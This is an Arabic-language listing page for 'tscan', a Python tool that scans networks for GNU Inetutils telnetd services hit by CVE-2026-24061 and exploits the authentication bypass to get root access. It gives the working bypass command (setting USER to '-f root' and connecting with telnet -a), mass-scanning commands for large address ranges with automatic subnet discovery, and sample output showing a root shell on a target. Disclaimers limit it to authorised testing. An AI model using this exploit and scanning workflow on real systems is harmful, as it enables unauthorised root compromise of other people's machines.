Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
tscan — # ماسح ضوئي مبني على بايثون يكتشف ويستغل ثغرة تجاوز المصادقة CVE-2026-24061 في خدمة telnetd، مما يتيح الوصول إلى قشرة الجذر (root shell) على خدمات GNU Inetutils الضعيفة. | Kitploit
أدوات/GitHubGitHub/cumakurt/tscan
الاستطلاعماسحات الثغرات الأمنيةمسح المنافذالاستغلالأمن الشبكاتاختبار الاختراقالتعلم والتعليم
GitHubcumakurt/tscan

tscan

# ماسح ضوئي مبني على بايثون يكتشف ويستغل ثغرة تجاوز المصادقة CVE-2026-24061 في خدمة telnetd، مما يتيح الوصول إلى قشرة الجذر (root shell) على خدمات GNU Inetutils الضعيفة.

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح تجاوز المصادقة Telnetd (CVE-2026-24061)

أداة مبنية بلغة Python لفحص واستغلال ثغرة CVE-2026-24061 في خدمات telnetd الخاصة بـ GNU Inetutils. تقوم هذه الأداة بفحص عناوين IP أو الشبكات بحثًا عن خدمات telnetd الضعيفة التي تسمح بتجاوز المصادقة مما يؤدي إلى الوصول إلى صلاحيات الجذر (root shell).


⚠️ إشعار قانوني مهم وإخلاء مسؤولية

هذا البرنامج مقدم لأغراض تعليمية واختبارات أمنية مصرح بها فقط.

1. الغرض التعليمي

تم تطوير هذا التطبيق لأغراض تعليمية فقط لتوضيح الثغرات الأمنية وللمساعدة في الاختبارات الأمنية والأبحاث المصرح بها.

2. لا يوجد ضمان

هذا البرنامج مقدم "كما هو"، دون أي ضمان من أي نوع، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر ضمانات القابلية للتسويق، والملاءمة لغرض معين، وعدم التعدي على الحقوق. لا يضمن المؤلفون والمساهمون أن البرنامج سيكون خاليًا من الأخطاء أو آمنًا أو فعالاً. قد يحتوي البرنامج على أخطاء برمجية أو عيوب أخرى.

3. مسؤولية المستخدم

تقع جميع المسؤولية والتبعات القانونية لاستخدام هذا البرنامج بالكامل على عاتق المستخدم. لا يتحمل المؤلفون أو المساهمون أو الموزعون لهذا البرنامج أي مسؤولية عن أي أضرار أو خسائر أو عواقب قانونية ناتجة عن استخدام أو إساءة استخدام أو عدم القدرة على استخدام هذا البرنامج.

4. حظر الاستخدام غير المصرح به

يجب استخدام هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وقد يؤدي إلى ملاحقة جنائية.

5. لا توجد ضمانات

لا يضمن المؤلفون عدم:

  • دقة نتائج الفحص
  • أمان التطبيق نفسه
  • التوافق مع جميع الأنظمة
  • خلوّه من الأخطاء البرمجية
  • أي وظيفة أو أداء محدد

باستخدامك لهذا البرنامج، فإنك تقر بأنك قرأت وفهمت ووافقت على الالتزام بهذه الشروط. إذا كنت لا توافق، فلا تستخدم هذا البرنامج.


المطور

تم التطوير بواسطة: Cuma KURT
البريد الإلكتروني: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

معلومات الثغرة

CVE-2026-24061: تسمح خدمة telnetd الخاصة بـ GNU Inetutils حتى الإصدار 2.7 بتجاوز المصادقة عن بُعد عبر قيمة -f root لمتغير البيئة USER.

درجة CVSS: 9.8 (حرجة)

المرجع: NVD CVE-2026-24061

الميزات

  • 🔍 فحص المنافذ: يكتشف منافذ telnet المفتوحة (الافتراضي: 23، قابل للتخصيص)
  • 🎯 اكتشاف الثغرات: يختبر قابلية استغلال CVE-2026-24061
  • ⚡ متعدد الخيوط: فحص متزامن سريع مع عدد خيوط قابل للتكوين
  • 📁 إدخال مرن: يدعم عناوين IP وشبكات CIDR وملفات قوائم الأهداف
  • 🗺️ اكتشاف تلقائي: اكتشاف وفحص الشبكات الفرعية تلقائيًا من جدول التوجيه
  • 🛑 إيقاف آمن: Ctrl+C يوقف الفحص بأمان ويعرض النتائج الجزئية
  • 📊 تقدم فوري: شريط تقدم مع إحصائيات ونتائج

التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أحدث
  • عميل telnet (مثبت مسبقًا عادةً على Linux/macOS)

تثبيت التبعيات

root@kitploit:~
pip3 install -r requirements.txt

ملاحظة: معظم التبعيات جزء من المكتبة القياسية للغة Python. تعمل الأداة مباشرة مع Python 3.6+.

الاستخدام

الاستخدام الأساسي

root@kitploit:~
# فحص عنوان IP واحد
python3 tscan.py 192.168.1.1

# فحص شبكة CIDR
python3 tscan.py 192.168.1.0/24

# الفحص بمنفذ مخصص
python3 tscan.py -p 2323 192.168.1.1

# فحص أهداف من ملف
python3 tscan.py targets.txt

# فحص عناوين IP متعددة
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# فحص شبكات CIDR متعددة
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

ضبط الأداء

root@kitploit:~
# زيادة عدد الخيوط لفحص أسرع (100 خيط)
python3 tscan.py -t 100 192.168.1.0/24

# زيادة المهلة الزمنية للشبكات البطيئة
python3 tscan.py --timeout 10 192.168.1.0/24

# الجمع بين الاثنين لفحص الشبكات الكبيرة
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

وضع الاكتشاف التلقائي

root@kitploit:~
# اكتشاف وفحص جميع الشبكات الفرعية تلقائيًا من جدول توجيه النظام
python3 tscan.py --auto
# أو باستخدام الصيغة المختصرة:
python3 tscan.py -a

# الاكتشاف التلقائي بمنفذ مخصص
python3 tscan.py --auto -p 2323
# أو:
python3 tscan.py -a -p 2323

# الاكتشاف التلقائي بعدد خيوط مرتفع
python3 tscan.py --auto -t 200
# أو:
python3 tscan.py -a -t 200

ملاحظة: يقرأ وضع --auto جدول توجيه النظام باستخدام أمر ip route list أو route -n ويفحص جميع الشبكات الفرعية المكتشفة تلقائيًا.

أمثلة من الواقع

root@kitploit:~
# مثال 1: فحص سريع للشبكة المحلية
python3 tscan.py 192.168.1.0/24

# مثال 2: فحص سريع بتزامن عالٍ
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# مثال 3: فحص منفذ telnet غير قياسي
python3 tscan.py -p 2323 192.168.1.0/24

# مثال 4: اكتشاف وفحص جميع الشبكات الفرعية المحلية تلقائيًا
python3 tscan.py --auto
# أو:
python3 tscan.py -a

# مثال 5: الاكتشاف التلقائي بإعدادات مخصصة
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# أو:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

خيارات سطر الأوامر

root@kitploit:~
positional arguments:
  targets               عنوان (عناوين) IP أو شبكة (شبكات) CIDR أو مسار (مسارات) ملفات تحتوي على الأهداف

options:
  -h, --help            عرض رسالة المساعدة هذه والخروج
  -p, --port PORT       منفذ Telnet للفحص (الافتراضي: 23)
  -t, --threads THREADS عدد الخيوط المتزامنة (الافتراضي: 50)
  --timeout TIMEOUT     مهلة الاتصال بالثواني (الافتراضي: 5)
  -v, --verbose         إخراج تفصيلي
  -a, --auto            اكتشاف وفحص جميع الشبكات الفرعية تلقائيًا من جدول توجيه النظام (route -n أو ip route list)

تنسيق ملف الإدخال

أنشئ ملفًا نصيًا بهدف واحد في كل سطر:

root@kitploit:~
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

الأسطر التي تبدأ بـ # تُعتبر تعليقات ويتم تجاهلها.

المخرجات

توفر الأداة:

  1. تقدم فوري: يعرض النتائج فور اكتشافها

    • شريط تقدم مع النسبة المئوية والإحصائيات
    • عدد المضيفين الضعفاء المعروض في شريط التقدم
    • [!] - مضيف ضعيف
    • [~] - المنفذ مفتوح ولكن غير ضعيف
    • الأهداف ذات المنافذ المغلقة يتم تخطيها بصمت
    • Ctrl+C (KeyboardInterrupt): يوقف الفحص بأمان ويعرض النتائج الجزئية فورًا
  2. تقرير الملخص: يتضمن:

    • إجمالي خدمات telnet المكتشفة
    • عدد المضيفين الضعفاء
    • قائمة مفصلة بالمضيفين الضعفاء

مثال على المخرجات

مخرجات الفحص الأساسي

root@kitploit:~
[*] بدء الفحص على 256 هدفًا...
[*] المنفذ: 23، الخيوط: 50، المهلة: 5 ثوانٍ

[*] التقدم: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | مفتوح: 2 | ضعيف: 1
[!] 192.168.1.100:23 - ضعيف
[*] التقدم: [████████████████████████████████████] 100.0% (256/256) | مفتوح: 3 | ضعيف: 1
[+] اكتمل الفحص: تم فحص 256/256 هدفًا

======================================================================
ملخص نتائج الفحص
======================================================================

خدمات telnet المكتشفة: 3
المضيفون الضعفاء: 1

[!] المضيفون الضعفاء:

  ● 192.168.1.100:23
    المخرجات: uid=0(root) gid=0(root) groups=0(root)...

[~] خدمات telnet المكتشفة ولكنها غير ضعيفة:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] اكتمل الفحص في 12.34 ثانية

كيف تعمل

  1. اكتشاف المنفذ: يتحقق مما إذا كان منفذ telnet مفتوحًا على عناوين IP المستهدفة
  2. محاولة الاستغلال: للمنافذ المفتوحة، يحاول استغلال CVE-2026-24061:
    • يضبط متغير البيئة USER="-f root"
    • يتصل عبر أمر telnet -a
    • يرسل أوامر اختبار للتحقق من الوصول إلى صلاحيات الجذر
  3. تصنيف النتائج: يصنف النتائج كضعيفة أو غير ضعيفة

تفاصيل الاستغلال

تسمح الثغرة بتجاوز المصادقة عن طريق ضبط متغير البيئة USER على -f root:

root@kitploit:~
USER="-f root" telnet -a TARGET_IP [PORT]

يؤدي هذا إلى تفسير telnetd لمتغير USER كعلامة (flag)، متجاوزًا المصادقة ومانحًا وصول الجذر.

القيود

  • يتطلب تثبيت عميل telnet
  • يعمل فقط ضد إصدارات telnetd الضعيفة (≤ 2.7)
  • يتطلب وضع الاكتشاف التلقائي أمر ip route list أو route -n

استكشاف الأخطاء وإصلاحها

"telnet command not found"

قم بتثبيت عميل telnet:

root@kitploit:~
# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# مثبت مسبقًا عادةً

لا توجد نتائج

  • تحقق من إمكانية الوصول إلى الأهداف
  • تحقق من قواعد جدار الحماية
  • تأكد من أن خدمات telnet تعمل فعليًا
  • حاول زيادة المهلة الزمنية: --timeout 10

الاستخدام القانوني والأخلاقي

هذه الأداة مخصصة لـ:

  • ✅ اختبار الاختراق المصرح به
  • ✅ البحث الأمني على أنظمتك الخاصة
  • ✅ تقييم الثغرات الأمنية بتفويض مناسب
  • ✅ الأغراض التعليمية في بيئات خاضعة للتحكم

لا تستخدم هذه الأداة من أجل:

  • ❌ الوصول غير المصرح به إلى الأنظمة
  • ❌ أنشطة القرصنة غير القانونية
  • ❌ أي نشاط دون إذن صريح

المراجع

  • تفاصيل CVE-2026-24061
  • تحليل SafeBreach Labs

الترخيص

هذا البرنامج برنامج حر: يمكنك إعادة توزيعه و/أو تعديله بموجب شروط رخصة جنو العمومية العامة كما نشرتها مؤسسة البرمجيات الحرة، إما الإصدار 3 من الرخصة، أو (حسب اختيارك) أي إصدار لاحق.

يتم توزيع هذا البرنامج على أمل أن يكون مفيدًا، ولكن دون أي ضمان؛ حتى دون الضمان الضمني لـ القابلية للتسويق أو الملاءمة لغرض معين. راجع رخصة جنو العمومية العامة لمزيد من التفاصيل.

يجب أن تكون قد استلمت نسخة من رخصة جنو العمومية العامة مع هذا البرنامج. إذا لم يكن الأمر كذلك، فانظر https://www.gnu.org/licenses/.

نص الترخيص الكامل

انظر إلى ملف LICENSE للحصول على النص الكامل لرخصة جنو العمومية العامة الإصدار 3.0.

إخلاء المسؤولية

المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط.

استخدمها على مسؤوليتك الخاصة. تقع جميع المسؤولية والتبعات القانونية لاستخدام هذا البرنامج بالكامل على عاتق المستخدم. لا يضمن المؤلفون دقة أو أمان أو وظائف هذا البرنامج. البرنامج مقدم "كما هو" دون أي ضمان من أي نوع.

تم تطوير هذا التطبيق لأغراض تعليمية فقط. باستخدامك لهذا البرنامج، فإنك تقر بأن:

  • تفهم أن هذه أداة تعليمية
  • جميع المسؤولية عن استخدامها تقع عليك
  • المؤلفون لا يقدمون أي ضمانات أو كفالات
  • ستستخدمها فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها
  • الاستخدام غير المصرح به غير قانوني وقد يؤدي إلى ملاحقة جنائية

إذا كنت لا توافق على هذه الشروط، فلا تستخدم هذا البرنامج.

تنزيل الأداة